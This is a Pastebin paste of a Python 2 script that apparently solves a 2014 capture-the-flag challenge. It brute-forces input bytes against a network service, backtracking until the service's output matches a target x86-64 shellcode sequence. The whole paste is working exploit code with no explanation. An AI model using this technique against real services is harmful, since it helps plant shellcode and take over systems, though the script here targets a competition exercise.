Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from socket import *
- from struct import *
- import sys
- import time
- def recvuntil(s, length):
- result = ""
- while True:
- result += s.recv(1)
- if len(result) >= length:
- break
- return result
- #s.connect(('byhd_147e0accdae13428910e909704b21b11.2014.shallweplayaga.me', 9730))
- shellcode = "48 8b 4d c8 48 83 c1 30 48 81 e2 ff 00 00 00 5b 48 83 eb 15 ff d3"
- shellcode = shellcode.replace(" ","").decode('hex')
- answer = ""
- ii = len(answer)
- fail = False
- while ii < 250:
- found = False
- if fail != True:
- i=0xff
- fail = False
- while i>=0:
- s = socket(AF_INET, SOCK_STREAM)
- s.connect(('192.168.0.41', 9730))
- #print hex(i)
- s.send(pack('<L', len(answer)+1))
- s.send(answer+chr(i))
- length = unpack('<L',s.recv(4))[0]
- data = recvuntil(s,length)
- print data
- data = data.decode('hex')
- if len(data) > len(answer) and data[len(answer):] == shellcode[len(answer):len(data)]:
- answer += chr(i)
- print "[+] Found:",answer.encode('hex')
- ii+=1
- s.close()
- found = True
- break
- if data[:len(shellcode)] == shellcode:
- print answer.encode('hex')
- sys.exit()
- s.close()
- time.sleep(0.01)
- i-=1
- if found == False:
- print "[-] Fail"
- if len(answer) <= 1:
- break
- else:
- last = answer[-1]
- i = ord(last) - 1
- answer = answer[:-1]
- ii-=1
- fail = True
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
